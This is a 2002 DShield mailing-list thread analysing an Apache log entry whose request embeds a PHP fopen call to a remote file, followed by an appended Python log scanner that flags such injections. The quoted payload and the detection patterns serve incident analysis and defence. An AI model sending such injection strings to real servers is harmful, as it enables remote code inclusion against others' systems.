[Dshield] interesting little snippet

Ed Truitt ed.truitt at etee2k.net
Wed Jul 10 12:33:01 GMT 2002


It looks to me like a piece of PHP code to open a remote file on an IP
assigned to fh-aalen.de in read mode as a binary file - even though it has a
".txt" extension.

I googled for "muschi.txt" and found 12 hits - all in Germany.  They all
appear to be p0rn-related, and when I opened up one of them (on a
sacrificial system) it fired off about a gazillion p0rn pop-ups.

Looking up the source IP, I found the following at RIPE:

inetnum:      194.182.2.0 - 194.182.2.255
netname:      TEC-TEKNISK-ERHVERVSSKOLE-CENTER-FREDERIKSBERG
descr:        Educational institution connected to SEKTORNET
descr:        the Router Network for the Ministery of Education in Denmark

My guess from all of this is that some skoolkiddie was looking for an open
proxy to use for viewing p0rn, maybe.

Something rotten in the state of Denmark?

Cheers,
Ed Truitt
PGP fingerprint:  5368 D25E 468C A250 9833  CCD6 DBAE 9C25 02F9 0AB9
http://www.etee2k.net
http://www.bsatroop148.org

"Note to spammers:  my 'delete' key is connected to YOUR ISP.
 Also, if you send me UCE, I reserve the right to post your spew
on my Web site, with the appropriate color commentary, so that
others may have a good laugh at your expense."
----- Original Message -----
From: "Mark Rowlands" <mark.rowlands at minmail.net>
To: <list at dshield.org>
Sent: Wednesday, July 10, 2002 3:44 AM
Subject: [Dshield] interesting little snippet


> Anyone seen this before? apache 2.0.39 running on freebsd 4.6
>
> 194.182.2.11 - - [30/Jun/2002:00:03:10 +0200] "GET /<?$fp=fopen("http://141.18.247.23/muschi.txt","%20rb");?> HTTP/1.1" 404 202 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
>
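
An added example, not part of the original thread: a log check that flags requests like the one quoted above, where the URI carries a PHP open tag and a remote URL. The logged request contains unescaped double quotes, so the example also shows that a common quote-delimited parser drops the line while an end-anchored one keeps it. All names (`TOLERANT`, `NAIVE`, `inspect`, `scan`) are hypothetical, and the second sample line is constructed.

```python
import re
from urllib.parse import unquote

# Tolerant pattern: the request is matched greedily and the fixed-shape fields
# after it (status, size, referer, agent) anchor the end, so unescaped double
# quotes inside the request do not cut it short.
TOLERANT = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>.*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')
# Common naive pattern that assumes the request never contains a double quote.
NAIVE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" (?P<status>\d{3}) ')

PHP_TAG = re.compile(r'<\?')
REMOTE_URL = re.compile(r'(?:https?|ftp)://[^\s"\'<>)]+', re.I)

SAMPLE_LOG = [
    # Log line from the message above, with the mail wrapping undone.
    r'194.182.2.11 - - [30/Jun/2002:00:03:10 +0200] "GET /<?$fp=fopen("http://141.18.247.23/muschi.txt","%20rb");?> HTTP/1.1" 404 202 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    # Constructed benign line for contrast (not from the message).
    r'192.0.2.10 - - [30/Jun/2002:00:05:00 +0200] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
]

def inspect(line):
    """Return a finding dict for a suspicious line, or None if it looks normal."""
    m = TOLERANT.match(line.strip())
    if m is None:
        # Surface lines that do not parse instead of silently skipping them.
        return {"host": None, "status": None, "reasons": ["unparseable"], "urls": []}
    _method, _, rest = m["request"].partition(" ")
    # Drop the trailing protocol token, then percent-decode the target.
    target = unquote(re.sub(r' HTTP/\d\.\d$', '', rest))
    reasons = []
    if PHP_TAG.search(target):
        reasons.append("php-open-tag-in-uri")
    urls = REMOTE_URL.findall(target)
    if urls:
        reasons.append("remote-url-in-uri")
    if not reasons:
        return None
    return {"host": m["host"], "status": int(m["status"]),
            "reasons": reasons, "urls": urls}

def scan(lines):
    """Inspect every line and keep only the findings."""
    return [f for f in map(inspect, lines) if f is not None]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```
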



